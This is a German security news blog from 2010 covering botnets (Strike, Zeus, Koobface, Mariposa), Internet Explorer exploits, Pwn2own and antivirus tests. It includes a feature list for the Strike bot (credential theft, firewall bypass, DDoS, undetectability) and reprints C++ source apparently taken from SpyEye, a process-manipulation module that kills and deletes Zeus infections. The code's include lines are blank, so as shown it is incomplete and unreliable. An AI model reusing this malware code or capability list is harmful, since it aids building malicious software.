ratNetw0rk Statistik

ip information

Mittwoch, 31. März 2010

Strike Ultimate Botnet

Strike Botnet ist ein neuer, fortschrittlicher HTTP basierte Bot, mit denen man mehre Tausende Computer steuern kann ohne das die Opfer etwas davon merken."Squeezer" (Scott Van Dinter ist 18 Jahre Jung und hat den Bot in VB6 und ASM Programmiert.



ActiveX Startup. An already well-known startup method.

Advanced Anti-Checking. -Different threads with continuous checks. 10 different methods

Attacking. As every botnet that serves to its purposes, it has a DDOS system that Works with TCP Connections and runs in the background.

Firewall Bypass. Add's itsself to the windows firewall. Unhooks ring3 firewall hooks

Process Protection. An advanced protection system will keep the process from being closed

File Protection. Strike is protected from deletion, even if the process is not running. Can't even be deleted by Rootkit Unhooker

Serial Stealing. Strike can steal the windows serial code, and more than other 200 serials.

Sockets. Strike uses API sockets to connect with the web interface (That means that it doesn’t use the well-known Winsock). It also uses the http protocol to bypass firewalls.

Spreading. Strike has the ability to spread itsself into every compressed folder (zip/rar) on the infected computer.

MSN Passwords. Strike is able to steal stored MSN passwords.

Internet Explorer. Strike is also able to steal Internet Explorer passwords.

Update. A very interesting feature, with this function Strike is also able to download a newer version and update itself.

Standard Funktionen.
Exit, Strike kann beendet werden.
Melt, Strike kann vollständig vom Computer entfernt werden.
BSOD, Strike kann einen Blue Screen of Death auslösen.
Kill, Strike kann Dateien auf dem Computer löschen.
Exec, Strike kann dateien auf dem Opfer ausführen.
Down, Strike kann Dateien über das HTTP Protokoll aus dem Internet Herunterladen und ausführen.

Strike ist FUD (Fully Undetectable) wen er Kompilliert wird und benötigt danach keinen Crypter um ihn vor Antivirenprogrammen zu verstecken.

Quelle: http://malwareint.blogspot.com

31.03.2010 11:15

Dienstag, 30. März 2010

Hosting Ukraine Burnt Out

Hosting UA in Odessa einer der wichtigsten Rechenzentren und Hosts in der Ukraine ist offline, durch einen großen Brand.

Image and video hosting by TinyPic

AS41665 Hosting-AS National-Hosting-Provider, UA mit 144.384 IP-Adressen war auf Platz #4 am HostExploit Bad Hosts-Bericht im Dezember 2009.Aus 34.000 ASN (Autonomes System / Hosts)wurde ein vergleich gemacht welche von Cyberkriminellen am meisten genutzt werden.Hosting UA hat im ersten Quartal 2010 einige verbesserungen gezeigt siehe HosTExploit Bad Host Report für März 2010.

Quelle: http://hostexploit.com
Quelle: http://rbnexploit.blogspot.com

Patch für Internet Explorer heute Abend

Microsoft hat für heute Abend einen Patch für den Internet Explorer 6 und 7 angekündigt. Damit soll das offene Sicherheitsleck im Browser geschlossen werden, das bereits aktiv für Angriffe ausgenutzt wird. Zudem werden neun weitere Sicherheitslücken im Internet Explorer beseitigt.

Seit dem 15. März 2010 bietet Microsoft einen Fix für den Internet Explorer, um das Risiko eines Angriffs zu verringen.

30.03.2010 10:06 Uhr

Donnerstag, 25. März 2010

Pwn2own: Browser Hacking ohne Probleme

Auf der dies jährigen Pwn2own der CanSec West in Vancouver gelangen es den Teilnehmern alle Browser ohne Probleme zu knacken.Das Top-Ereignis war jedoch, dass es Vincenzo Iozzo und Ralf-Philipp Weinmann erstmals gelang, im Rahmen des Pwn2own-Wettbewerbs ein iPhone zu knacken.

Dem Newcomer Peter Vreugdenhil gelang es, den Internet Explorer 8 auf Windows 7 trotz ALSR und DEP zu knacken, dem Vorjahresstar Nils und Pwn2own-Veteran Charlie Miller zückten aus ihrer 0day Sammlung ein Exploit und knackten damit Apples Safari und heimsten sich damit ein MacBook Pro ein.

(Zitat: heise-Security)
Allerdings sollte man mit Schlussfolgerungen hinsichtlich der Sicherheit der einzelnen Produkte vorsichtig sein. Pwn2own ist vor allem ein Spektakel. Niemand weiß, wer wie viel Zeit damit verbracht hat, Sicherheitslücken zu finden und passende Exploits zu bauen. So erklärte Charlie Miller gegenüber heise Security, dass er sich von vornherein auf Safari festgelegt habe. Ob er in der gleichen Zeit auch einen Exploit in Chrome hätte finden können oder nicht, sei reine Spekulation. Er sei zu der Auffassung gelangt, dass Pwn2own keine Aussagen darüber erlaube, welches Produkt am sichersten sei.

25.03.10 23:30 Uhr

Mittwoch, 24. März 2010

Spam-Bot Bots knacken Hotmail Audio-CAPTCHAs

Microsofts Web-Mail-Dienst Live Hotmail wird einmal mehr durch Spammer missbraucht, die die aufgestellten Hürden für automatisierte Anmeldungen überwinden. Dazu knacken sie erstmals auch Audio-CAPTCHAs.

Wer bei populären Mail-Diensten wie Microsoft Live Hotmail ein neues Benutzerkonto anlegen will, muss zum Schutz vor Spammer-Attacken eingerichtete Hürden überwinden, so genannte CAPTCHAs. Automatisierte Programme der Spammer haben Hotmail-CAPTCHAs schon mehrfach austricksen können. Jetzt nutzen sie die Hilfen für Sehbehinderte aus.

Da Blinde und stark Sehbehinderte mit den verzerrten Buchstaben eines visuellen CAPTCHA nicht viel anfangen können, gibt es auch hörbare Varianten dieser Spammer-Abwehr. Ein Audio-CAPTCHA besteht bei Hotmail aus gesprochenen Ziffern, die mit Hintergrundgeräuschen unterlegt und daher schwer zu verstehen sind. Damit soll verhindert werden, dass Spracherkennungsprogramme die Zahlen automatisch erkennen können.

Das Sicherheitsunternehmen Webroot meldet, dass die Spammer inzwischen die Audio-CAPTCHAs beim Anlegen einer Windows Live ID überwinden können. Wie Andrew Brandt im Webroot Threat Blog ausführlich berichtet, nutzt der seit Jahren bekannte Spam-Bot Pushdo (Alias: Cutwail) das Symbol und die Dateieigenschaften des Passwort-Managers Keepass, um sich zu tarnen.

Pushdo lädt die Audiodatei mit der Ansage herunter und liefert die korrekte Antwort binnen weniger Sekunden zurück an das Anmeldeformular. Dies klappt in der Regel bereits beim zweiten Versuch, manchmal auch schon beim ersten. Unklar ist, wie das genau funktioniert.

Denkbar ist, dass die Audiodatei über eines der Botnet-Mutterschiffe an Menschen geschickt wird, die das CAPTCHA für einen sehr niedrigen Lohn lösen. Ebenfalls vorstellbar ist, dass die Bots alle bei Hotmail vorhandenen Audiodateien einmal herunter geladen und eine Prüfsumme sowie die Lösungen zentral gespeichert haben.

Ist das CAPTCHA erstmal überwunden, kann ein neues Benutzerkonto angelegt werden, das sogleich als neue Spam-Schleuder dient. In der Vergangenheit haben Spam-Bots meist die visuellen CAPTCHAs geknackt, nicht nur bei Hotmail sondern auch bei Google Mail und anderen.

Quelle: PcWelt.de

Avira Antivir 10

Der beliebte Deutsche AV-Speziallist Avira stellt seit gestern seine Produkte in der Version 10 zum Download bereit.



Eines der interessantesten neuen Features ist der ProActiv Schutz der aber leider nicht der Kostenlosen Version beiliegt und die verbesserten generischen Reparaturfunktionen, die nun erfolgreicher verseuchte Dateien von Schädlingen befreien können sollen.Der Security-Suite wurde ein Kinderschutz hinzugefügt mir dem Eltern die Online-Zeiten ihrer Kinder beschränken können,zu dem wurde die Benutzeroberfläche vereinfacht.Laut AV-Test erkennt AntiVir Personal 10 98,6 Prozent des Schädlingszoos, zu dem sei die Rootkit-Erkennung auf einem hohen Level.Nach Angaben von AV-Test habe sich die Reinigungsfunktion stark verbessert,bei einiegen Reiniegungsversuchen kamm es aber noch zu Abstüzen "Da sei noch einiges zu tun".

24.03.10 08:44 Uhr

Montag, 22. März 2010

Sicherheits-Scanner Skipfish

Google hat einen kostenlosen Sicherheitsscanner zum Download bereitgestellt, mit dem man Websites und Webanwendungen auf Sicherheitslücken testen kann.



Der Scanner ist kostenlos und Open-Source.Laut Google sind 2000 Anfragen pro Sekunde problemlos möglich mit eienr sehr geringen CPU Belastung.Um Schwachstellen zu erkennen, nutzt der Scanner heuristische Methoden: Er analysiert den Quellcode auf verdächtige Stellen hin.Skipfish ist nicht als EXE-Datei erhältlich, sondern als C-Quellcode, der erst noch kompiliert werden muss.Unter Linux-, FreeBSD 7.0+- und MacOS X-Systemen klappt das standardmäßig ganz gut.Für Windows kann man Cygwin verwenden der es auch erlaubt Linux oder Unix-Software unter Windows zu starten.

22.03.10 13:37 Uhr

Don`t be evil

Image and video hosting by TinyPic

Googles will dem Web-Analyse-Flaggschiff des Hauses um eine Privat-Option erweitern. Per Plug-In sollen Nutzer von Analytics künftig abschalten, wenn sie selbst nicht mehr vom Dienst getrackt werden wollen.Der Programmzusatz ist derzeit noch i nder Testphase, bevor das Plug-In in den nächsten Wochen global zur Verfügung gestellt werden soll, kündigte Analytics-PM Amy Chang im Blog an.Die Begründung für die nützliche Ergänzung: »In den letzten Jahren haben wir Wege erforscht, um dem Nutzer mehr Wahl dabei einzuräumen, wie Google Analytics ihre Daten sammelt.« Lügen haben Langebeine wie wir alle wissen.Die Ankündigung kommt hgenau in dem Augenblick wo Google eine Klagevon einer Studentin der Harvard Law School erhielt, die dem Konzern die Verletzung ihrer Privatsphäre vorwirft. Gewinnt sie, könnte das eine Klagewelle mit unabschätzbaren Entschädigungssummen auslösen.

22.03.10 13:24 Uhr

Sonntag, 21. März 2010

FIRE: FInding RoguE Networks

FIRE ist ein Service auf unseriöse Netzwerke und Internet Service Provider zu identifizieren.

FIRE: FInding RoguE Networks

Fire hat eine liste aller Registrierten ASN im Internet in einer Liste aufgeführt,es ist möglich auch nach einer ASN suchen zu lassen um sie schneller zu finden.Unter den Top 20 sind viele bekannte ISP´s wie Wahome,Bluehost oder Gnax zu finden die C&C,Phishing oder Exploit Server beherbergen.

21.03.10 11:37 Uhr

Samstag, 20. März 2010

Security rules by Bart Simpson





















20.03.10 14:32 Uhr

Pwn2Own-Wettbewerb IE 8 und iPhone werden zuerst gehackt

Der Hacker-Wettbewerb Pwn2Own findet in der kommenden Woche in Vancouver statt. Der Sponsor des Wettbewerbs erwartet, dass Microsofts Internet Explorer und das iPhone den Hackern zuerst zum Opfer fallen.

Image and video hosting by TinyPic

Die diesjährige Sicherheitskonferenz CanSecWest findet ab 24. März im kanadischen Vancouver statt. Wie in den letzten Jahren wird auch diesmal wieder der Hacker-Wettbewerb "Pwn2Own" die meiste Aufmerksamkeit auf sich ziehen. Die 3Com-Tochter TippingPoint, Sponsor des Wettbewerbs, hat insgesamt 100.000 US-Dollar an Preisgeldern ausgelobt. Außerdem können die Gewinner das gehackte Gerät mit nach Hause nehmen.

Aaron Portnoy, leitender Sicherheitsforscher bei TippingPoint, sieht den Internet Explorer 8 und nicht etwa Apple Safari als denjenigen Browser an, der in diesem Jahr als erster fallen wird. Dies schließt er aus den Anmeldungen für die vierte Ausgabe des Wettbewerbs. Ursprünglich hatte Portnoy auf Safari getippt. Doch einer seiner Kollegen scheint einen IE8-Exploit in der Tasche zu haben. Apples iPhone wird seiner Meinung nach das erste der Smartphones sein, das gehackt wird.

Als Zielscheiben für die Sicherheitsforscher haben die Veranstalter die neuesten Browser-Versionen von IE, Firefox, Safari und Chrome aufgestellt, die auf Rechnern mit Windows 7 oder Mac OS X 10.6 laufen. Als Smartphones stehen neben dem iPhone ein Blackberry Bold 9700, ein Nokia-Gerät mit Symbian S60 (voraussichtlich ein E62) sowie ein Motorola mit Android-Betriebssystem, vermutlich ein Droid, bereit.

Im letzten Jahr brauchte Charlie Miller gerade einmal zehn Sekunden, um ein MacBook zu hacken. Ein Student aus Deutschland hackte nacheinander den IE 8, Firefox und Safari. Nur Chrome blieb ungeschoren.

19.03.2010, 16:12 Uh

Dienstag, 16. März 2010

ZeUs jetzt mit Kopierschuzt

Die Aktuelle version von ZeUs ist jetzt mit einem Kopier erhältlich was verhindern soll das eine nicht vom Programmierer erworbene Version nicht funktionsfähig ist.
Zeus ist ein Malware-Baukasten, der zum Diebstahl von Online-Banking-Daten eingesetzt wird. Die Software kostet derzeit um die 3000 bis 4000$.Die Aktuelle Zeus-Version wird anscheinend nur von ihrem Programmierer verkauft.Ältere Versionen kursieren als billige Raubkopien oder sind gratis erhältlich.

SecureWorks hat herausgefunden, daß der Zeus-Server nur mit einem für das aktuelle System angepassten Schlüssel funktioniert. Dazu erstellt er ähnlich wie etwa Windows beim ersten Start eine Art Fingerabdruck der vorgefundenen Hardware-Konfiguration. Für diesen erhält der Betreiber dann vom Hersteller einen individualisierten Lizenzschlüssel.



Der Zeus-Server ist für die Steuerung des Bot-Netzes zuständig. Er kommuniziert mit den Dronen – den Bots –, nimmt deren Daten entgegen und erteilt ihnen Befehle. Die Server.exe, die sich auf den Systemen der Opfer befindet, benötigt keinen Lizenz-Key.

Der Programmierer von ZeUs ist dafür bekannt nicht von ihm erworbene Versionen an Antivirenfirmen zu melden.Zukünftige Versionen sollen mit polymorpher Verschlüsselung ausgestattet werden. Die zurzeit im Beta-Test befindliche Version 1.4 erzeugt bei jeder Infektion einen neuen Schlüssel, was die Erkennung durch Antivirus-Software weiter erschweren soll. Außerdem soll sie auch bei Firefox Daten in den Web-Datenstrom injizieren können, um Transaktionen zu manipulieren.

16.03.10 20:24 Uhr

ZeuS Banking Trojan Report

Kunden Daten von Arcor auf dem Schwarzmarkt aufgetaucht

Immer wieder werden Fälle von Datendiebstahl bekannt. Inzwischen gibt es wohl keinen Berufszweig mehr, der vom Daten-Diebstahl verschont geblieben. Wie nun bekannt wurde, soll es auch bei dem beim früheren Telekommunikationsanbieter Arcor und dem Kabelnetzbetreiber Unitymedia zu Datendiebstahl gekommen sein.

Berichten zu Folge sollen vermutlich bis zu 200.000 Datensätze von Arcor-Kunden und Kunden des Kabelnetzbetreiber Unitymedia, vermutlich aus dem Jahr 2000, auf dem Schwarzmarkt aufgetaucht sein. Es wird berichtet, dass die Staatsanwaltschaft Bonn das Unternehmen bereits im November 2009 informiert habe, dass 2006 gestohlene Kundendaten der Vodafone-Tochter Arcor entdeckt wurden. In dem aus dem Jahr 2000 stammenden Datensätzen sollen zwar Namen, Adressen und Telefonnummern von Arcor-Kunden enthalten sein, Kontodaten allerdings nicht.


Es wird berichtet, dass die Datensätze von Arcor durch eine Sicherheitslücke bei einem Callcenter-Betreiber an die Öffentlichkeit, beziehungsweise auf den Schwarzmarkt, gelangt sein sollen. Es wäre nicht das erste mal, dass sich ein Callcenter als Risiko oder Sicherheitslücke im Datenverkehr heraus stellen würde. In dem Wirtschaftsmagazins Capital wird berichtet, dass dem Telekommunikationsanbieter Vodafone, dem Nachfolger von Arcor, das Datenleck bereits seit November 2009 bekannt sei. Da die Ermittler die entscheidenden Informationen noch nicht weitergeleitet haben, hätte der Telekommunikationsanbieter die entsprechenden Datensätze noch nicht überprüfen können.

Da bis Dato noch keine Überprüfung der Datensätze vorgenommen werden konnte, konnten auch die von dem Sicherheitsproblem betroffenen Kunden noch nicht informiert werden. Somit können derzeit nur alle ehemaligen Arcor-Kunden hoffen, dass ihre Daten nicht auf dem Schwarzmarkt im Umlauf sind. Jeder Internet-Nutzer ist setzt darum Bemüht seine Daten bestmöglich vor Übergriffen zu schützen. Immer wieder wird man durch bekannt werden von Daten-Diebstahl, daran erinnert, dass der beste eigenen Datenschutz wenig nützt, wenn man seine Daten bei einem Unternehmen hinterlegen musste, das von einem Datenleck betroffen ist. Somit, bleibt immer nur die Hoffnung, dass die eigenen Daten nicht doch irgendwie auf den Schwarzmarkt gelangen.

virenschutz.info

Freitag, 12. März 2010

Koobface verdoppelt Zahl der Command & Control Server

Die Betreiber des bei Twitter und Facebook bekannten Wurms Koobface bauen ihre Server massiv aus.Die Zahl der Kommando-Server ist zunächst langsam auf einen stand von 71 gesunken, innerhalb von 48 Stunden hat sich die Zahl der Server dann verdoppelt.



Laut Stefan Tanase, Kaspersky Lab,ist diese Entwicklung des Koobface Botnetz geplant und illustriert die Wartungsstrategie der Betreiber.Die Zahl der C&C Server schwanke ständig um die 100. Sinken sie zu weit nach unten, haben die Bot-Herder offenbar genug Reserven, um dies schnell wieder auszugleichen.

Nach Beobachtungen von Kaspersky befindet sich die Mehrzahl der Server in den USA. Die übrigen sind weltweit verteilt und die Betreiber verlassen sich auch nicht auf einzelne Provider. Vielmehr streuen sie breit, um das Risiko zu verringern mit dem Abklemmen eines Providers einen großen Teil ihrer Kontrollstrukturen einzubüßen.

Die Zahl der US-Server ist seit Ende 2009 leicht gestiegen, auf mehr als die Hälfte. Bereits auf dem zweiten Platz rangiert weiterhin Deutschland, wo etwa 8,5 Prozent der Server stehen. Auch die Niederlande, die Türkei, Österreich und die Schweiz sind unter den Top 10.

12.03.10 18:38 Uhr

Donnerstag, 11. März 2010

Zeus-Botnet stark geschwächt

Mehrere Internet-Provider, deren Netzwerke einem großen Teil der Kommando-Server des Zeus-Botnetzes Unterschlupf boten, sind von Internet getrennt worden. Die Zahl aktiver Zeus-Server ist dadurch deutlich eingebrochen.

Image and video hosting by TinyPic

Die Zahl der Dronen ist durch das Abklemmen der Peering-Partner um ein viertel gesunken.Der Provider Troyak, der sechs Web-Provider anbindet, die mindestens 68 Zeus-Server beherbergen, versucht seitdem eine neue Anbindung zu erhalten.Troyak scheint einen Provider in Russland gefunden zu haben wärend ein anderer Zeus-Provider namens Group 3 bis lang erfolglos dabei ist.Etwa 104 von 330 zeus-Servern soleln laut zeus-Tracker offline sein.Zeus zählt zu dem am weitesten verbreiteten Bots.Die Dronen werden durch die Zeus-Server gesteuert und mit Spam versorgt, den sie dann versenden.Die Hintergründe für die geschilderten Vorgänge um die Zeus-Provider sind derzeit noch unklar.

11.03.10 20:12 Uhr

0 - Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 (default)

Für das Zero Day Exploit des Internet Explorers 6 und 7 ist ein Modul für das Metasploit Framework aufgetaucht.

Internet Explorer iepeers.dll Use After Free

ie_iepeers_pointer.rb

Bis jetzt wurden von Microsoft nur wenige Angrieffe beobachtet,bei der eine Lücke in der Komponente iepeers.dll zum Infizieren eines Systems ausgenutzt wurde.Das Metasploit-Modul funktioniert für Microsoft Internet Explorer 7 unter Windows Vista SP2, Internet Explorer 7 unter Windows XP SP3 sowie Internet Explorer 6 unter Windows XP SP3,aber nur dann wen die Datenausführungsverhinderung (DEP) noch nicht aktiviert wurde.

11.03.10 18:20 Uhr

Exploit-Code für IE-Lücke veröffentlicht

Beispiel-Code für die von Microsoft am 9. März bekannt gemachte Sicherheitslücke im Internet Explorer ist mittlerweile allgemein verfügbar. Online-Kriminelle nutzen die Lücke für Drive-by-Angriffe im Web.

Microsoft hat beim Patch Day am 9. März eine Sicherheitsmitteilung veröffentlicht, in der es über eine neu entdeckte Sicherheitslücke im Internet Explorer berichtet. Während Microsoft darin noch von einzelnen, gezielten Angriffen spricht, ist Beispiel-Code für diese Schwachstelle inzwischen öffentlich verfügbar. Damit werden breiter angelegte Angriffe immer wahrscheinlicher.

Für das Metasploit Framework, ein Projekt für Penetrationstester, ist ein Modul erhältlich, das die IE-Lücke ausnutzen kann. HD Moore, Gründer von Metasploit, schätzt den Exploit-Code als halbwegs zuverlässig ein. In etwa 50 Prozent der Fälle funktioniere er. Auch andere Sicherheitsforscher, wie etwa Andrea Lelli von Symantec, berichten über Abstürze beim Testen des Exploit-Code. Lelli hat im Symantec Security Response Blog eine ausführliche Analyse veröffentlicht.

Der Angriffs-Code funktioniert vor allem im inzwischen fast neun Jahre alten IE 6, der noch auf vielen Windows-XP-Rechnern im Einsatz ist. Im Nachfolger IE 7 führt der Code oft nur zum Absturz, im aktuellen IE 8 funktioniert er gar nicht. Wird die Schwachstelle mit Erfolg ausgenutzt, lädt der dabei eingeschleuste Code ein Trojanisches Pferd aus dem Internet herunter.

11.03.2010, 14:51 Uhr

Mittwoch, 10. März 2010

Skimmers beim Installieren

Hier haben sich 2 Skimmer beim einbau ihre Hardware filmen lassen.Leider habe ich keine weiteren Infos dazu als dieses kleine Video.



Video Quelle: Spiegel.de & German Federal Criminal Office (Bundeskriminalamt)

10.03.10 15:43 Uhr

Mariposa Statistik

Panda Security hat jetzt eine übersicht der Infektionsrate des Mariposa Botnet auf ihren Blog veröffentlicht.Panda Security ist es gelungen die DNS der C&C Server zu ändern um einen zugrieff auf das Botnet durch das DDP Team zu verhindern.

Dies sind die Top 10 Länder:


10.03.10 15:10 Uhr

Dienstag, 9. März 2010

Bot on Board bei Vodafone

Mariposa treibt noch immer sein Unwesen mit Conficker im Team auf dem Vodafone HTC.



Die Malware wurde bemerkt als eine Kollegin des leitenden Malware-Forscher Pedro Bustamante von Panda Security ihr neues Handy per USB an den Computer anschloss und der Antivirus die autorun.inf und autorun.exe erkannte.Nach einer Untersuchung der Speicherkarte wurde eine Variante von Mariposa/ButerFly Bot entdeckt.

Die Spanische Poizei hatte letzte woche in zusammenarbeit mit dem FBI ein von der Guppe DDP Team betriebens Mariposa Botnet zerschlagen und die Hintermänner festgenommen.Nach näherer Untersuchung von Pedro Bustamante konnte er Conficker und einen Trojaner entdecken der Passwörter für das Onlinespiel Lineage ausspioniert.

Die Anzahl der betroffenen Geräte ist noch unklar und wie sie auf die Handys gelangen konnten,anrichten können sie aber nichts da es sich um Malware für Windows Pc´s handelt.

09.03.10 15:14 Uhr

Test: IObit Security 360 Pro

IObit Security 360 Pro ist eine neue einfache Schutzsoftware, die Scanner- und verhaltensbasierte Wächter-Funktionen umfasst und dabei niedrige Systemanforderungen stellt. Helfen soll das Programm vor allem gegen Ad- und Spyware, ohne funktionierenden Selbstschutz ist es jedoch eine leicht zu überwindende Barriere.



Anbieter: Pohlmedia Distribution
Weblink: www.iobit-security.de
Preis: 19,99 Euro
Betriebssysteme: Windows 2000, XP, Vista, Win 7
Plattenplatz: ca. 27 MB

Einen ausführlichen Bericht gibt es bei PcWelt.

Test: IObit Security 360 Pro

Sonntag, 7. März 2010

ZeuS Killer (Source-Code)

Ein Kumpel hat eine kleine PDF über Spy-Eye gefunden mit dem ZeUs Killer Source-Code.

spyeye-analysis-ii-en.pdf

ZeuS Killer code

This is the C++ source code for the Zeus Killer
#include
#pragma warning(disable : 4005) // macro redefinition
#include
#pragma warning(default : 4005)
#include
#include
void GetZeusInfo(ULONG dwArg, PCHAR lpOut, DWORD dwOutLn, PCHAR lpMutex, DWORD dwMutexLn)
{
PSYSTEM_HANDLE_INFORMATION shi = 0;
NTSTATUS Status = 0;
ULONG len = 0x2000;
POBJECT_NAME_INFORMATION obn = 0;
HANDLE proc = 0, thandle = 0, hFile = 0;
BOOLEAN enable = FALSE;
UCHAR name[300] = {0};
ULONG temp = 0, rw = 0;
do
{
shi = (PSYSTEM_HANDLE_INFORMATION)malloc(len);
if (shi == 0)
{
return;
}
Status = NtQuerySystemInformation(SystemHandleInformation, shi, len, NULL);
if (Status == STATUS_INFO_LENGTH_MISMATCH)
{
free(shi);
len *= 2;
}
else
if (NT_ERROR(Status))
{
free(shi);
return;
}
} while (Status == STATUS_INFO_LENGTH_MISMATCH);
RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, 1, 0, &enable);
for (int i=0; i<(int)shi->uCount; i++)
{
proc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, shi->aSH[i].uIdProcess);
if (proc == 0)
{
continue;
}
Status = NtDuplicateObject(proc, (HANDLE)shi->aSH[i].Handle, NtCurrentProcess(),
&thandle, 0, 0, DUPLICATE_SAME_ACCESS);
if (NT_ERROR(Status))
{
NtClose(proc);
continue;
}
Status = NtQueryObject(thandle, ObjectNameInformation, 0, 0, &len);
if (Status != STATUS_INFO_LENGTH_MISMATCH || len == 0)
{
NtClose(thandle);
NtClose(proc);
continue;
}
obn = (POBJECT_NAME_INFORMATION)malloc(len);
if (obn == 0)
{
NtClose(thandle);
NtClose(proc);
continue;
}
Status = NtQueryObject(thandle, ObjectNameInformation, obn, len, &len);
if (NT_ERROR(Status) || obn->Name.Buffer == 0)
{
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
RtlZeroMemory(name, sizeof(name));
WideCharToMultiByte(CP_ACP, 0, obn->Name.Buffer, obn->Name.Length >> 1,
(LPSTR)name, 300, NULL, NULL);
if (strstr((LPSTR)name, "__SYSTEM__") || strstr((LPSTR)name, "_AVIRA_"))
{
lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\");
lstrcatW((LPWSTR)name, obn->Name.Buffer);
__retry:
hFile = CreateFileW((LPWSTR)name, GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
if (hFile == INVALID_HANDLE_VALUE)
{
WaitNamedPipeW((LPWSTR)name, INFINITE);
hFile = CreateFileW((LPWSTR)name,
GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
if (hFile == INVALID_HANDLE_VALUE)
{
WCHAR wszBNO[] = { L"\\BaseNamedObjects\\" };
if (LPWSTR wszBNOPos = StrStrW((LPWSTR)name, wszBNO))
{
lstrcpyW((LPWSTR)name, L"\\\\.\\pipe\\");
lstrcatW((LPWSTR)name,
(LPWSTR)((PBYTE)wszBNOPos + (sizeof(wszBNO) - 1 * sizeof(WCHAR))));
goto __retry;
}
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
}
temp = PIPE_READMODE_MESSAGE;
if (!SetNamedPipeHandleState(hFile, &temp, 0, 0))
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
temp = dwArg;
if (!WriteFile(hFile, &temp, 4, &rw, 0))
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
temp = 0;
if (!WriteFile(hFile, &temp, 4, &rw, 0))
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
temp = 0;
if (!WriteFile(hFile, &temp, 0, &rw, 0))
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
temp = 0;
if (!ReadFile(hFile, &temp, 4, &rw, 0))
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
temp = 0;
if (!ReadFile(hFile, &temp, 4, &rw, 0))
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
if (temp > MAX_PATH)
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
rw = temp;
temp = (ULONG)malloc(temp);
if (!temp)
{
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
if (!ReadFile(hFile, (PVOID)temp, rw, &rw, 0))
{
free((PVOID)temp);
CloseHandle(hFile);
free(obn);
NtClose(thandle);
NtClose(proc);
continue;
}
if ( (temp) && lstrlenW((LPCWSTR)temp) < (int)dwOutLn) {
RtlZeroMemory(lpOut, dwOutLn);
WideCharToMultiByte(CP_ACP, 0, (PWCHAR)temp,
lstrlenW((LPCWSTR)temp), (LPSTR)lpOut, dwOutLn, NULL, NULL);
}
if (lpMutex) {
LPWSTR lpwMutexName = obn->Name.Buffer;
LPWSTR lpwTemp;
while (lpwTemp = StrStrW(lpwMutexName, L"\\")) {
lpwMutexName = lpwTemp + 1;
}
RtlZeroMemory(lpMutex, dwMutexLn);
WideCharToMultiByte(CP_ACP, 0, lpwMutexName,
lstrlenW(lpwMutexName), (LPSTR)lpMutex, dwMutexLn, NULL, NULL);
}
free((PVOID)temp);
CloseHandle(hFile);
}
free(obn);
NtClose(thandle);
NtClose(proc);
}
}
BOOL DeleteHiddenFile(PCHAR szPath)
{
SetFileAttributes(szPath, FILE_ATTRIBUTE_ARCHIVE);
return DeleteFile(szPath);
}
#define ZEUS_FASTCLEAN
BOOL KillZeus()
{
// Getting info
CHAR szMutexName[MAX_PATH] = {0};
CHAR szZeusPath[MAX_PATH];
GetZeusInfo(11, szZeusPath, sizeof szZeusPath, szMutexName, sizeof szMutexName);
if (!strlen(szMutexName)) {
#ifdef _DEBUGLITE
OutputDebugStringEx(__FUNCTION__" : ERROR : Cannot get szMutexName");
#endif
return FALSE;
}
#ifndef ZEUS_FASTCLEAN
CHAR szZeusConfig[MAX_PATH];
GetZeusInfo(12, szZeusConfig, sizeof szZeusConfig, NULL, NULL);
CHAR szZeusLog[MAX_PATH];
GetZeusInfo(13, szZeusLog, sizeof szZeusLog, NULL, NULL);
#endif
#ifdef _DEBUGLITE
OutputDebugStringEx(__FUNCTION__" : INFO : 0.) Mutex \"%s\"", szMutexName);
OutputDebugStringEx(__FUNCTION__" : INFO : 1.) Path \"%s\"", szZeusPath);
#ifndef ZEUS_FASTCLEAN
OutputDebugStringEx(__FUNCTION__" : INFO : 2.) Config \"%s\"", szZeusConfig);
OutputDebugStringEx(__FUNCTION__" : INFO : 3.) Log \"%s\"", szZeusLog);
#endif
#endif
// Killing
GetZeusInfo(3, NULL, NULL, NULL, NULL);
// Waiting
HANDLE hMutex;
for (INT i = 0; i < 10; i++) {
hMutex =
OpenMutex(MUTANT_QUERY_STATE|SYNCHRONIZE|STANDARD_RIGHTS_REQUIRED, FALSE,
szMutexName);
if (!hMutex)
break;
CloseHandle(hMutex);
Sleep(1000);
}
if (hMutex) {
#ifdef _DEBUGLITE
OutputDebugStringEx(__FUNCTION__" : ERROR : hMutex is still active");
#endif
return FALSE;
}
// Deleting files
if (!DeleteHiddenFile(szZeusPath)) {
#ifdef _DEBUGLITE
OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"",
szZeusPath);
#endif
}
#ifndef ZEUS_FASTCLEAN
if (!DeleteHiddenFile(szZeusConfig)) {
#ifdef _DEBUGLITE
OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"",
szZeusConfig);
#endif
}
if (!DeleteHiddenFile(szZeusLog)) {
#ifdef _DEBUGLITE
OutputDebugStringEx(__FUNCTION__" : WARNING : Cannot delete \"%s\"",
szZeusLog);
#endif
}
#endif
#ifdef _DEBUGLITE
OutputDebugStringEx(__FUNCTION__" : INFO : EXIT");
#endif
return TRUE;
}

Samstag, 6. März 2010

Kaspersky Virus Watch

